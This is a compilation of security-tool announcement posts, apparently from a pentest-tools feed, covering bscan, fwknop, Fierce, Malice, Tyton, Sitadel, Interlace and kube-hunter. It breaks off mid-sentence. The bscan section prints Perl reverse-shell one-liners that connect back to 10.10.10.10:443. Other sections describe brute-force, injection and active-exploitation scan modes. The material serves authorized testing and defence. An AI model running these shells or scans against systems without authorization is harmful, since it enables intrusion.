Bscan – An Asynchronous Target Enumeration Tool

Synopsisbscan is a command-line utility to perform active information gathering and service enumeration. At its core, bscan asynchronously spawns processes of well-known scanning utilities, repurposing scan results into highlighted console output and a well-defined directory structure.Installationbscan was written to be run on Kali Linux, but there is nothing inherently preventing it from running on any OS with the appropriate tools installed.Download the latest packaged version from PyPI:pip install bscanOr get the bleeding-edge version from version control:pip install https://github.com/welchbj/bscan/archive/master.tar.gzBasic Usagebscan has a wide variety of configuration options which can be used to tune scans to your needs. Here’s a quick example:$ bscan \> –max-concurrency 3 \> –patterns [Mm]icrosoft \> –status-interval 10 \> –verbose-status \> scanme.nmap.orgWhat’s going on here?–max-concurrency 3 means that no more than 3 concurrent scan subprocesses will be run at a time–patterns [Mm]icrosoft defines a custom regex pattern with which to highlight matches in the generated scan output–status-interval 10 tells bscan to print runtime status updates every 10 seconds–verbose-status means that each of these status updates will print details of all currently-running scan subprocessesscanme.nmap.org is the host upon which we want to enumeratebscan also relies on some additional configuration files. The default files can be found in the bscan/configuation directory and serve the following purposes:patterns.txt specifies the regex patterns to be highlighted in console output when matched with scan outputrequired-programs.txt specifies the installed programs that bscan plans on usingport-scans.toml defines the port-discovering scans to be run on the target(s), as well as the regular expressions used to parse port numbers and service names from scan outputservice-scans.toml defines the scans be run on the target(s) on a per-service basisDetailed OptionsHere’s what you should see when running bscan –help:usage: bscan [OPTIONS] targets _| |__ ___ ___ __ _ _ __| ‘_ \/ __|/ __/ _` | ‘_ \| |_) \__ \ (__ (_| | | | ||_.__/|___/\___\__,_|_| |_|an asynchronous service enumeration toolpositional arguments: targets the targets and/or networks on which to perform enumerationoptional arguments: -h, –help show this help message and exit –brute-pass-list F filename of password list to use for brute-forcing –brute-user-list F filename of user list to use for brute-forcing –cmd-print-width I the maximum integer number of characters allowed when printing the command used to spawn a running subprocess (defaults to 80) –config-dir D the base directory from which to load the configuration files; required configuration files missing from this directory will instead be loaded from the default files shipped with this program –hard force overwrite of existing directories –max-concurrency I maximum integer number of subprocesses permitted to be running concurrently (defaults to 20) –no-program-check disable checking the presence of required system programs –no-file-check disable checking the presence of files such as configured wordlists –no-service-scans disable running scans on discovered services –output-dir D the base directory in which to write output files –patterns [ [ …]] regex patterns to highlight in output text –ping-sweep enable ping sweep filtering of hosts from a network range before running more intensive scans –quick-only whether to only run the quick scan (and not include the thorough scan over all ports) –qs-method S the method for performing the initial TCP port scan; must correspond to a configured port scan –status-interval I integer number of seconds to pause in between printing status updates; a non-positive value disables updates (defaults to 30) –ts-method S the method for performing the thorough TCP port scan; must correspond to a configured port scan –udp whether to run UDP scans –udp-method S the method for performing the UDP port scan; must correspond to a configured port scan –verbose-status whether to print verbose runtime status updates, based on frequency specified by `–status-interval` flag –version program version –web-word-list F the wordlist to use for scansCompanion ToolsThe main bscan program ships with two utility programs (bscan-wordlists and bscan-shells) to make your life a little easier when looking for wordlists and trying to open reverse shells.bscan-wordlists is a program designed for finding wordlist files on Kali Linux. It searches a few default directories and allows for glob filename matching. Here’s a simple example:$ bscan-wordlists –find “*win*"/usr/share/wordlists/wfuzz/vulns/dirTraversal-win.txt/usr/share/wordlists/metasploit/sensitive_files_win.txt/usr/share/seclists/Passwords/common-passwords-win.txtTry bscan-wordlists –help to explore other options.bscan-shells is a program that will generate a variety of reverse shell one-liners with target and port fields populated for you. Here’s a simple example to list all Perl-based shells, configured to connect back to 10.10.10.10 on port 443:$ bscan-shells –port 443 10.10.10.10 | grep -i -A1 perlperl for windowsperl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’perl with /bin/shperl -e ‘use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’perl without /bin/shperl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.10.10:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’Note that bscan-shells pulls these commands from the reverse-shells.toml configuration file. Try bscan-shells –help to explore other options.DevelopmentStart by setting up a new development environment and installing the requirements (using virtualenvwrapper / virtualenvwrapper-win):# setup the environmentmkvirtualenv -p $(which python3) bscan-devworkon bscan-dev# get the depspip install -r dev-requirements.txtLint and type-check the project (these are run on Travis, too):flake8 . && mypy bscanWhen it’s time to package a new release:# build source and wheel distributionspython setup.py bdist_wheel sdist# run post-build checkstwine check dist/*# upload to PyPItwine upload dist/*Download Bscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/nmAEkhGVeYk/bscan-asynchronous-target-enumeration.html

Fwknop – Single Packet Authorization & Port Knocking

fwknop implements an authorization scheme known as Single Packet Authorization (SPA) for strong service concealment. SPA requires only a single packet which is encrypted, non-replayable, and authenticated via an HMAC in order to communicate desired access to a service that is hidden behind a firewall in a default-drop filtering stance. The main application of SPA is to use a firewall to drop all attempts to connect to services such as SSH in order to make the exploitation of vulnerabilities (both 0-day and unpatched code) more difficult. Because there are no open ports, any service that is concealed by SPA naturally cannot be scanned for with Nmap. The fwknop project supports four different firewalls: iptables, firewalld, PF, and ipfw across Linux, OpenBSD, FreeBSD, and Mac OS X. There is also support for custom scripts so that fwknop can be made to support other infrastructure such as ipset or nftables.SPA is essentially next generation Port Knocking (PK), but solves many of the limitations exhibited by PK while retaining its core benefits. PK limitations include a general difficulty in protecting against replay attacks, asymmetric ciphers and HMAC schemes are not usually possible to reliably support, and it is trivially easy to mount a DoS attack against a PK server just by spoofing an additional packet into a PK sequence as it traverses the network (thereby convincing the PK server that the client doesn’t know the proper sequence). All of these shortcomings are solved by SPA. At the same time, SPA hides services behind a default-drop firewall policy, acquires SPA data passively (usually via libpcap or other means), and implements standard cryptographic operations for SPA packet authentication and encryption/decryption.SPA packets generated by fwknop leverage HMAC for authenticated encryption in the encrypt-then-authenticate model. Although the usage of an HMAC is currently optional (enabled via the –use-hmac command line switch), it is highly recommended for three reasons:Without an HMAC, cryptographically strong authentication is not possible with fwknop unless GnuPG is used, but even then an HMAC should still be applied.An HMAC applied after encryption protects against cryptanalytic CBC-mode padding oracle attacks such as the Vaudenay attack and related trickery (like the more recent “Lucky 13" attack against SSL).The code required by the fwknopd daemon to verify an HMAC is much more simplistic than the code required to decrypt an SPA packet, so an SPA packet without a proper HMAC isn’t even sent through the decryption routines.The final reason above is why an HMAC should still be used even when SPA packets are encrypted with GnuPG due to the fact that SPA data is not sent through libgpgme functions unless the HMAC checks out first. GnuPG and libgpgme are relatively complex bodies of code, and therefore limiting the ability of a potential attacker to interact with this code through an HMAC operation helps to maintain a stronger security stance. Generating an HMAC for SPA communications requires a dedicated key in addition to the normal encryption key, and both can be generated with the –key-gen option.fwknop encrypts SPA packets either with the Rijndael block cipher or via GnuPG and associated asymmetric cipher. If the symmetric encryption method is chosen, then as usual the encryption key is shared between the client and server (see the /etc/fwknop/access.conf file for details). The actual encryption key used for Rijndael encryption is generated via the standard PBKDF1 key derivation algorithm, and CBC mode is set. If the GnuPG method is chosen, then the encryption keys are derived from GnuPG key rings.Use CasesPeople who use Single Packet Authorization (SPA) or its security-challenged cousin Port Knocking (PK) usually access SSHD running on the same system where the SPA/PK software is deployed. That is, a firewall running on a host has a default-drop policy against all incoming SSH connections so that SSHD cannot be scanned, but a SPA daemon reconfigures the firewall to temporarily grant access to a passively authenticated SPA client: "Basic SPA usage to access SSHD"fwknop supports the above, but also goes much further and makes robust usage of NAT (for iptables/firewalld firewalls). After all, important firewalls are usually gateways between networks as opposed to just being deployed on standalone hosts. NAT is commonly used on such firewalls (at least for IPv4 communications) to provide Internet access to internal networks that are on RFC 1918 address space, and also to allow external hosts access to services hosted on internal systems.Because fwknop integrates with NAT, SPA can be leveraged to access internal services through the firewall by users on the external Internet. Although this has plenty of applications on modern traditional networks, it also allows fwknop to support cloud computing environments such as Amazon’s AWS: "SPA usage on Amazon AWS cloud environments"User InterfaceThe official cross-platform fwknop client user interface fwknop-gui (download, github) is developed by Jonathan Bennett. Most major client-side SPA modes are supported including NAT requests, HMAC and Rijndael keys (GnuPG is not yet supported), fwknoprc stanza saving, and more. Currently fwknop-gui runs on Linux, Mac OS X, and Windows – here is a screenshot from OS X:  "fwknop-gui on Mac OS X" Similarly, an updated Android client is available as well.TutorialA comprehensive tutorial on fwknop can be found here:http://www.cipherdyne.org/fwknop/docs/fwknop-tutorial.htmlFeaturesThe following is a complete list of features supported by the fwknop project:Implements Single Packet Authorization around iptables and firewalld firewalls on Linux, ipfw firewalls on *BSD and Mac OS X, and PF on OpenBSD.The fwknop client runs on Linux, Mac OS X, *BSD, and Windows under Cygwin. In addition, there is an Android app to generate SPA packets.Supports both Rijndael and GnuPG methods for the encryption/decryption of SPA packets.Supports HMAC authenticated encryption for both Rijndael and GnuPG. The order of operation is encrypt-then-authenticate to avoid various cryptanalytic problems.Replay attacks are detected and thwarted by SHA-256 digest comparison of valid incoming SPA packets. Other digest algorithms are also supported, but SHA-256 is the default.SPA packets are passively sniffed from the wire via libpcap. The fwknopd server can also acquire packet data from a file that is written to by a separate Ethernet sniffer (such as with tcpdump -w ), from the iptables ULOG pcap writer, or directly via a UDP socket in –udp-server mode.For iptables firewalls, ACCEPT rules added by fwknop are added and deleted (after a configurable timeout) from custom iptables chains so that fwknop does not interfere with any existing iptables policy that may already be loaded on the system.Supports inbound NAT connections for authenticated SPA communications (iptables firewalls only for now). This means fwknop can be configured to create DNAT rules so that you can reach a service (such as SSH) running on an internal system on an RFC 1918 IP address from the open Internet. SNAT rules are also supported which essentially turns fwknopd into a SPA-authenticating gateway to access the Internet from an internal network.Multiple users are supported by the fwknop server, and each user can be assigned their own symmetric or asymmetric encryption key via the /etc/fwknop/access.conf file.Automatic resolution of external IP address via https://www.cipherdyne.org/cgi-bin/myip (this is useful when the fwknop client is run from behind a NAT device). Because the external IP address is encrypted within each SPA packet in this mode, Man-in-the-Middle (MITM) attacks where an inline device intercepts an SPA packet and only forwards it from a different IP in an effort to gain access are thwarted.Port randomization is supported for the destination port of SPA packets as well as the port over which the follow-on connection is made via the iptables NAT capabilities. The later applies to forwarded connections to internal services and to access granted to local sockets on the system running fwknopd.Integration with Tor (as described in this DefCon 14 presentation). Note that because Tor uses TCP for transport, sending SPA packets through the Tor network requires that each SPA packet is sent over an established TCP connection, so technically this breaks the "single" aspect of "Single Packet Authorization". However, Tor provides anonymity benefits that can outweigh this consideration in some deployments.Implements a versioned protocol for SPA communications, so it is easy to extend the protocol to offer new SPA message types and maintain backwards compatibility with older fwknop clients at the same time.Supports the execution of shell commands on behalf of valid SPA packets.The fwknop server can be configured to place multiple restrictions on inbound SPA packets beyond those enforced by encryption keys and replay attack detection. Namely, packet age, source IP address, remote user, access to requested ports, and more.Bundled with fwknop is a comprehensive test suite that issues a series of tests designed to verify that both the client and server pieces of fwknop work properly. These tests involve sniffing SPA packets over the local loopback interface, building temporary firewall rules that are checked for the appropriate access based on the testing config, and parsing output from both the fwknop client and fwknopd server for expected markers for each test. Test suite output can easily be anonymized for communication to third parties for analysis.fwknop was the first program to integrate port knocking with passive OS fingerprinting. However, Single Packet Authorization offers many security benefits beyond port knocking, so the port knocking mode of operation is generally deprecated.Building fwknopThis distribution uses GNU autoconf for setting up the build. Please see the INSTALL file for the general basics on using autoconf.There are some "configure" options that are specific to fwknop. They are (extracted from ./configure –help): –disable-client Do not build the fwknop client component. The default is to build the client. –disable-server Do not build the fwknop server component. The default is to build the server. –with-gpgme support for gpg encryption using libgpgme [default=check] –with-gpgme-prefix=PFX prefix where GPGME is installed (optional) –with-gpg=/path/to/gpg Specify path to the gpg executable that gpgme will use [default=check path] –with-firewalld=/path/to/firewalld Specify path to the firewalld executable [default=check path] –with-iptables=/path/to/iptables Specify path to the iptables executable [default=check path] –with-ipfw=/path/to/ipfw Specify path to the ipfw executable [default=check path] –with-pf=/path/to/pfctl Specify path to the pf executable [default=check path] –with-ipf=/path/to/ipf Specify path to the ipf executable [default=check path]Examples:./configure –disable-client –with-firewalld=/bin/firewall-cmd./configure –disable-client –with-iptables=/sbin/iptables –with-firewalld=noDownload Fwknop

Link: http://www.kitploit.com/2019/02/fwknop-single-packet-authorization-port.html

Fierce – Semi-Lightweight Scanner That Helps Locate Non-Contiguous IP Space And Hostnames Against Specified Domains

Fierce is a semi-lightweight scanner that helps locate non-contiguous IP space and hostnames against specified domains.It’s really meant as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all of those require that you already know what IP space you are looking for.This does not perform exploitation and does not scan the whole internet indiscriminately. It is meant specifically to locate likely targets both inside and outside a corporate network.Because it uses DNS primarily you will often find mis-configured networks that leak internal address space. That’s especially useful in targeted malware.Options:-connect Attempt to make http connections to any non RFC1918 (public) addresses. This will output the return headers but be warned, this could take a long time against a company with many targets, depending on network/machine lag. I wouldn’t recommend doing this unless it’s a small company or you have a lot of free time on your hands (could take hours-days). Inside the file specified the text “Host:\n" will be replaced by the host specified. Usage:perl fierce.pl -dns example.com -connect headers.txt-delay The number of seconds to wait between lookups.-dns The domain you would like scanned.-dnsfile Use DNS servers provided by a file (one per line) for reverse lookups (brute force).-dnsserver Use a particular DNS server for reverse lookups (probably should be the DNS server of the target). Fierce uses your DNS server for the initial SOA query and then uses the target’s DNS server for all additional queries by default.-file A file you would like to output to be logged to.-fulloutput When combined with -connect this will output everything the webserver sends back, not just the HTTP headers.-help This screen.-nopattern Don’t use a search pattern when looking for nearby hosts. Instead dump everything. This is really noisy but is useful for finding other domains that spammers might be using. It will also give you lots of false positives, especially on large domains.-range Scan an internal IP range (must be combined with -dnsserver). Note, that this does not support a pattern and will simply output anything it finds. Usage:perl fierce.pl -range 111.222.333.0-255 -dnsserver ns1.example.co-search Search list. When fierce attempts to traverse up and down ipspace it may encounter other servers within other domains that may belong to the same company. If you supply a comma delimited list to fierce it will report anything found. This is especially useful if the corporate servers are named different from the public facing website. Usage:perl fierce.pl -dns examplecompany.com -search corpcompany,blahcompany Note that using search could also greatly expand the number of hosts found, as it will continue to traverse once it locates servers that you specified in your search list. The more the better.-suppress Suppress all TTY output (when combined with -file).-tcptimeout Specify a different timeout (default 10 seconds). You may want to increase this if the DNS server you are querying is slow or has a lot of network lag.-threads Specify how many threads to use while scanning (default is single threaded).-traverse Specify a number of IPs above and below whatever IP you have found to look for nearby IPs. Default is 5 above and below. Traverse will not move into other C blocks.-version Output the version number.-wide Scan the entire class C after finding any matching hostnames in that class C. This generates a lot more traffic but can uncover a lot more information.-wordlist Use a seperate wordlist (one word per line). Usage:perl fierce.pl -dns examplecompany.com -wordlist dictionary.txtfierce Usage Exampleroot@kali:~# fierce -dns example.com DNS Servers for example.com: b.iana-servers.net a.iana-servers.netTrying zone transfer first…Testing b.iana-servers.net Request timed out or transfer not allowed.Testing a.iana-servers.net Request timed out or transfer not allowed.Unsuccessful in zone transfer (it was worth a shot)Okay, trying the good old fashioned way… brute forceChecking for wildcard DNS…Nope. Good.Now performing 2280 test(s)…Download Fierce-Domain-Scanner

Link: http://feedproxy.google.com/~r/PentestTools/~3/X8Fc7tY8OFI/fierce-semi-lightweight-scanner-that.html

Scanner-Cli – A Project Security/Vulnerability/Risk Scanning Tool

The Hawkeye scanner-cli is a project security, vulnerability and general risk highlighting tool. It is meant to be integrated into your pre-commit hooks and your pipelines.Running and configuring the scannerThe Hawkeye scanner-cli assumes that your directory structure is such that it keeps the toolchain’s files on top level. Roughly, this is what it boils down to:Node.js projects have a package.json on top levelRuby projects will have a Gemfile on top levelPython projects will have a requirements.txt on top levelPHP projects will have a composer.lock on top levelJava projects will have a build (gradle) or target (maven) folder, and include .java and .jar filesThis is not exhaustive as sometimes tools require further files to exist. To understand how the modules decide whether they can handle a project, please check the How it works section and the modules folder.Docker (recommended)The docker image is hands-down the easiest way to the scanner. Please note that your project root (e.g. $PWD) needs to be mounted to /target.docker run –rm -v $PWD:/target hawkeyesec/scanner-cliThe docker build is also the recommended way to run the scanner in your CI pipelines. This is an example of running Hawkeye against one of your projects in GoCD:

Link: http://feedproxy.google.com/~r/PentestTools/~3/JoL8_BBnrhQ/scanner-cli-project-securityvulnerabili.html

Malice – VirusTotal Wanna Be (Now With 100% More Hipster)

Malice’s mission is to be a free open source version of VirusTotal that anyone can use at any scale from an independent researcher to a fortune 500 company.Try It OutDEMO: demo.malice.iousername: malicepassword: ecilamRequirementsHardware~16GB disk space~4GB RAMSoftwareDockerGetting Started (OSX)Install$ brew install maliceio/tap/maliceUsage: malice [OPTIONS] COMMAND [arg…]Open Source Malware Analysis FrameworkVersion: 0.3.11Author: blacktop – Options: –debug, -D Enable debug mode [$MALICE_DEBUG] –help, -h show help –version, -v print the versionCommands: scan Scan a file watch Watch a folder lookup Look up a file hash elk Start an ELK docker container plugin List, Install or Remove Plugins help Shows a list of commands or help for one commandRun ‘malice COMMAND –help’ for more information on a command.Scan some malware$ malice scan evil.malwareNOTE: On the first run malice will download all of it’s default plugins which can take a while to complete.Malice will output the results as a markdown table that can be piped or copied into a results.md that will look great on Github see hereStart Malice’s Web UI$ malice elkYou can open the Kibana UI and look at the scan results here: http://localhost (assuming you are using Docker for Mac)Type in malice as the Index name or pattern and click Create. Now click on the Malice Tab and behold!!! Getting Started (Docker in Docker)Install/Update all Pluginsdocker run –rm -v /var/run/docker.sock:/var/run/docker.sock malice/engine plugin update –allScan a filedocker run –rm -v /var/run/docker.sock:/var/run/docker.sock \ -v `pwd`:/malice/samples \ -e MALICE_VT_API=$MALICE_VT_API \ malice/engine scan SAMPLEDocumentationDocumentationPluginsExamplesRoadmapContributingDownload Malice

Link: http://feedproxy.google.com/~r/PentestTools/~3/MYaRxSE3IIE/malice-virustotal-wanna-be-now-with-100.html

Tyton – Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+

Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+.For more information, visit Tyton’s website.Detected AttacksHidden ModulesSyscall Table HookingNetwork Protocol HookingNetfilter HookingZeroed Process InodesProcess Fops HookingInterrupt Descriptor Table HookingAdditional FeaturesNotifications: Users (including myself) do not actively monitor their journald logs, so a userland notification daemon has been included to monitor journald logs and display them to the user using libnotify. Notifications are enabled after install by XDG autorun, so if your DM does not have /etc/xdg/autostart it will fail.DKMS: Dynamic Kernel Module Support has been added for Arch and Fedora/CentOS (looking to expand in the near future). DKMS allows the (near) seamless upgrading of Kernel modules during kernel upgrades. This is mainly important for distributions that provide rolling releases or upgrade their kernel frequently.InstallingDependenciesLinux Kernel 4.4.0-31 or greaterCorresponding Linux Kernel HeadersGCCMakeLibnotifyLibsystemdPackage ConfigGTK3From SourceUbuntu/Debian/Kalisudo apt install linux-headers-$(uname -r) gcc make libnotify-dev pkg-config libgtk-3-dev libsystemd-devgit clone https://github.com/nbulischeck/tyton.gitcd tytonmakesudo insmod tyton.koNote: For Ubuntu 14.04, libsystemd-dev is named libsystemd-journal-dev.Archsudo pacman -S linux-headers gcc make libnotify libsystemd pkgconfig gtk3git clone https://github.com/nbulischeck/tyton.gitcd tytonmakesudo insmod tyton.koNote: It’s recommended to install Tyton through the AUR so you can benefit from DKMS.Fedora/CentOSdnf install kernel-devel gcc make libnotify libnotify-devel systemd-devel gtk3-devel gtk3git clone https://github.com/nbulischeck/tyton.gitcd tytonmakesudo insmod tyton.koKernel Module ArgumentsThe kernel module can be passed a specific timeout argument on insertion through the command line.To do this, run the command sudo insmod tyton.ko timeout=X where X is the number of minutes you would like the kernel module to wait before executing its scan again.AURTyton is available on the AUR here.You can install it using the AUR helper of your choice:yaourt -S tyton-dkms-gityay -S tyton-dkms-gitpakku -S tyton-dkms-gitDownload Tyton

Link: http://feedproxy.google.com/~r/PentestTools/~3/-SpNjyLloZM/tyton-linux-kernel-mode-rootkit-hunter.html

Sitadel – Web Application Security Scanner

Sitadel is basically an update for WAScan making it compatible for python >= 3.4 It allows more flexibility for you to write new modules and implement new features :Frontend framework detectionContent Delivery Network detectionDefine Risk Level to allow for scansPlugin systemDocker image available to build and runInstallation$ git clone https://github.com/shenril/Sitadel.git$ cd Sitadel$ pip install .$ python sitadel.py –helpFeaturesFingerprints ServerWeb Frameworks (CakePHP,CherryPy,…)Frontend Frameworks (AngularJS,MeteorJS,VueJS,…)Web Application Firewall (Waf)Content Management System (CMS)Operating System (Linux,Unix,..)Language (PHP,Ruby,…)Cookie SecurityContent Delivery Networks (CDN)Attacks: Bruteforce Admin InterfaceCommon BackdoorsCommon Backup DirectoryCommon Backup FileCommon DirectoryCommon FileLog FileInjection HTML InjectionSQL InjectionLDAP InjectionXPath InjectionCross Site Scripting (XSS)Remote File Inclusion (RFI)PHP Code InjectionOther HTTP Allow MethodsHTML ObjectMultiple IndexRobots PathsWeb DavCross Site Tracing (XST)PHPINFO.ListingVulnerabilities ShellShockAnonymous Cipher (CVE-2007-1858)Crime (SPDY) (CVE-2012-4929)Struts-ShockExampleSimple runpython sitadel http://website.com Run with risk level at DANGEROUS and do not follow redirectionspython sitadel http://website.com -r 2 –no-redirectRun specifics modules only and full verbositypython sitadel http://website.com -a admin backdoor -f header server -vvvRun with dockerdocker build -t sitadel .docker run sitadel http://example.comDownload Sitadel

Link: http://feedproxy.google.com/~r/PentestTools/~3/zfPWuXefLsw/sitadel-web-application-security-scanner.html

Interlace – Easily Turn Single Threaded Command Line Applications Into Fast, Multi Threaded Ones With CIDR And Glob Support

Easily turn single threaded command line applications into fast, multi threaded application with CIDR and glob support.SetupInstall using:$ python3 setup.py installDependencies will then be installed and Interlace will be added to your path as interlace.Usage Argument Description -t Specify a target or domain name either in comma format, CIDR notation, or as an individual host. -tL Specify a list of targets or domain names -threads Specify the maximum number of threads to run at any one time (DEFAULT:5) -timeout Specify a timeout value in seconds for any one thread (DEFAULT:600) -c Specify a single command to execute over each target or domain -cL Specify a list of commands to execute over each target or domain -o Specify an output folder variable that can be used in commands as _output_ -p Specify a list of port variable that can be used in commands as _port_. This can be a single port, a comma delimited list, or use dash notation -rp Specify a real port variable that can be used in commands as _realport_ –no-cidr If set then CIDR notation in a target file will not be automatically be expanded into individual hosts. –no-color If set then any foreground or background colours will be stripped out –silent If set then only important information will be displayed and banners and other information will be redacted. -v If set then verbose output will be displayed in the terminal Further information regarding ports (-p) Example Notation Type 80 Single port 1-80 Dash notation, perform a command for each port from 1-80 80,443 Perform a command for both port 80, and port 443 Further information regarding targets (-t or -tL)Both -t and -tL will be processed the same. You can pass targets the same as you would when using nmap. This can be done using CIDR notation, dash notation, or a comma delimited list of targets. A single target list file can also use different notation types per line.Variable ReplacementsThe following varaibles will be replaced in commands at runtime: Variable Replacement _target_ Replaced with the expanded target list that the current thread is running against _host_ Works the same as _target_, can be used interchangably. _output_ Replaced with the output folder variable from interlace _port_ Replaced with the expanded port variable from interlace _realport_ Replaced with the real port variable from interlace Usage ExamplesRun Nikto Over Multiple SitesLet’s assume that you had a file targets.txt that had the following contents:bugcrowd.comhackerone.comYou could use interlace to run over any number of targets within this file using: bash➜ /tmp interlace -tL ./targets.txt -threads 5 -c “nikto –host _target_ > ./_target_-nikto.txt" -v==============================================Interlace v1.0 by Michael Skelton (@codingo_)==============================================[14:33:23] [THREAD] [nikto –host hackerone.com > ./hackerone.com-nikto.txt] Added to Queue [14:33:23] [THREAD] [nikto –host bugcrowd.com > ./bugcrowd.com-nikto.txt] Added to Queue This would run nikto over each host and save to a file for each target. Note that in the above example since we’re using the > operator so results won’t be fed back to the terminal, however this is desired functionality as otherwise we wouldn’t be able to attribute which target Nikto results were returning for.For applications where you desire feedback simply pass commands as you normally would (or use tee).Run Nikto Over Multiple Sites and PortsUsing the above example, let’s assume you want independant scans to be run for both ports 80 and 443 for the same targets. You would then use the following:➜ /tmp interlace -tL ./targets.txt -threads 5 -c "nikto –host _target_:_port_ > ./_target_-_port_-nikto.txt" -p 80,443 -v==============================================Interlace v1.0 by Michael Skelton (@codingo_)==============================================[14:33:23] [THREAD] [nikto –host hackerone.com:80 > ./hackerone.com-nikto.txt] Added to Queue [14:33:23] [THREAD] [nikto –host bugcrowd.com:80 > ./hackerone.com-nikto.txt] Added to Queue [14:33:23] [THREAD] [nikto –host bugcrowd.com:443 > ./bugcrowd.com-nikto.txt] Added to Queue [14:33:23] [THREAD] [nikto –host hackerone.com:443 > ./hackerone.com-nikto.txt] Added to Queue Run a List of Commands against Target HostsOften with penetration tests there’s a list of commands you want to run on nearly every job. Assuming that list includes testssl.sh, nikto, and sslscan, you could save a command list with the following in a file called commands.txt:nikto –host _target_:_port_ > _output_/_target_-nikto.txtsslscan _target_:_port_ > _output_/_target_-sslscan.txttestssl.sh _target_:_port_ > _output_/_target_-testssl.txtIf you were then given a target, example.com you could run each of these commands against this target using the following:interlace -t example.com -o ~/Engagements/example/ -cL ./commands.txt -p 80,443This would then run nikto, sslscan, and testssl.sh for both port 80 and 443 against example.com and save files into your engagements folder.CIDR notation with an application that doesn’t support itInterlace automatically expands CIDR notation when starting threads (unless the –no-cidr flag is passed). This allows you to pass CIDR notation to a variety of applications:To run a virtual host scan against every target within 192.168.12.0/24 using a direct command you could use:interlace -t 192.168.12.0/24 -c "vhostscan _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50This is despite VHostScan not having any inbuilt CIDR notation support. Since Interlace expands the notation before building a queue of threads, VHostScan for all intents is only receiving a list of direct IP addresses to scan.Glob notation with an application that doesn’t support itInterlace automatically expands glob ranges when starting threads. This allows you to pass glob ranges to a variety of applications:To run a virtual host scan against every target within 192.168.12.* using a direct command you could use:interlace -t 192.168.12.* -c "vhostscan _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50Yet again, VHostScan does not having any inbuilt glob range format support.Threading Support for an application that doesn’t support itRun a virtual host scan against each host in a file (target-lst.txt), whilst also limiting scans at any one time to 50 maximum threads.This could be done using a direct command:interlace -tL ./target-list.txt -c "vhostscan -t _target_ -oN _output_/_target_-vhosts.txt" -o ~/scans/ -threads 50Or, alternatively, to run the same command as above, but using a command file, this would be done using:interlace -cL ./vhosts-commands.txt -tL ./target-list.txt -threads 50 -o ~/scansThis presumes that the contents of the command file is:vhostscan -t $target -oN _output_/_target_-vhosts.txtThis would output a file for each target in the specified output folder. You could also run multiple commands simply by adding them into the command file.Auhors and ThanksOriginally written by Michael Skelton (codingo) and Sajeeb Lohani (sml555) with help from Charelle Collett (@Charcol0x89) for threading refactoring and overall appraoch, and Luke Stephens (hakluke) for testing and approach.Download Interlace

Link: http://feedproxy.google.com/~r/PentestTools/~3/WogS-qr4dno/interlace-easily-turn-single-threaded.html

Kube-Hunter – Hunt For Security Weaknesses In Kubernetes Clusters

Kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was developed to increase awareness and visibility for security issues in Kubernetes environments. You should NOT run kube-hunter on a Kubernetes cluster you don’t own!Run kube-hunter: kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at kube-hunter.aquasec.com where you can register online to receive a token allowing you see and share the results online. You can also run the Python code yourself as described below.Contribute: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your own modules please read Guidelines For Developing Your First kube-hunter Module.HuntingWhere should I run kube-hunter?Run kube-hunter on any machine (including your laptop), select Remote scanning and give the IP address or domain name of your Kubernetes cluster. This will give you an attackers-eye-view of your Kubernetes setup.You can run kube-hunter directly on a machine in the cluster, and select the option to probe all the local network interfaces.You can also run kube-hunter in a pod within the cluster. This gives an indication of how exposed your cluster would be in the event that one of your application pods is compromised (through a software vulnerability, for example).Scanning optionsBy default, kube-hunter will open an interactive session, in which you will be able to select one of the following scan options. You can also specify the scan option manually from the command line. These are your options: Remote scanning To specify remote machines for hunting, select option 1 or use the –remote option. Example: ./kube-hunter.py –remote some.node.com Internal scanning To specify internal scanning, you can use the –internal option. (this will scan all of the machine’s network interfaces) Example: ./kube-hunter.py –internal Network scanning To specify a specific CIDR to scan, use the –cidr option. Example: ./kube-hunter.py –cidr 192.168.0.0/24 Active HuntingActive hunting is an option in which kube-hunter will exploit vulnerabilities it finds, in order to explore for further vulnerabilities. The main difference between normal and active hunting is that a normal hunt will never change state of the cluster, while active hunting can potentially do state-changing operations on the cluster, which could be harmful.By default, kube-hunter does not do active hunting. To active hunt a cluster, use the –active flag. Example: ./kube-hunter.py –remote some.domain.com –activeList of testsYou can see the list of tests with the –list option: Example: ./kube-hunter.py –listTo see active hunting tests as well as passive: ./kube-hunter.py –list –activeOutputTo control logging, you can specify a log level, using the –log option. Example: ./kube-hunter.py –active –log WARNING Available log levels are:DEBUGINFO (default)WARNINGTo see only a mapping of your nodes network, run with –mapping option. Example: ./kube-hunter.py –cidr 192.168.0.0/24 –mapping This will output all the Kubernetes nodes kube-hunter has found.DeploymentThere are three methods for deploying kube-hunter:On MachineYou can run the kube-hunter python code directly on your machine.PrerequisitesYou will need the following installed:python 2.7pipClone the repository:git clone git@github.com:aquasecurity/kube-hunter.gitInstall module dependencies:cd ./kube-hunterpip install -r requirements.txtIn the case where you have python 3.x in the path as your default, and python2 refers to a python 2.7 executable, use “python2 -m pip install -r requirements.txt"Run: ./kube-hunter.pyContainerAqua Security maintains a containerised version of kube-hunter at aquasec/kube-hunter. This container includes this source code, plus an additional (closed source) reporting plugin for uploading results into a report that can be viewed at kube-hunter.aquasec.com. Please note that running the aquasec/kube-hunter container and uploading reports data are subject to additional terms and conditions.The Dockerfile in this repository allows you to build a containerised version without the reporting plugin.If you run the kube-hunter container with the host network it will be able to probe all the interfaces on the host:docker run -it –rm –network host aquasec/kube-hunterNote for Docker for Mac/Windows: Be aware that the "host" for Docker for Mac or Windows is the VM which Docker runs containers within. Therefore specifying –network host allows kube-hunter access to the network interfaces of that 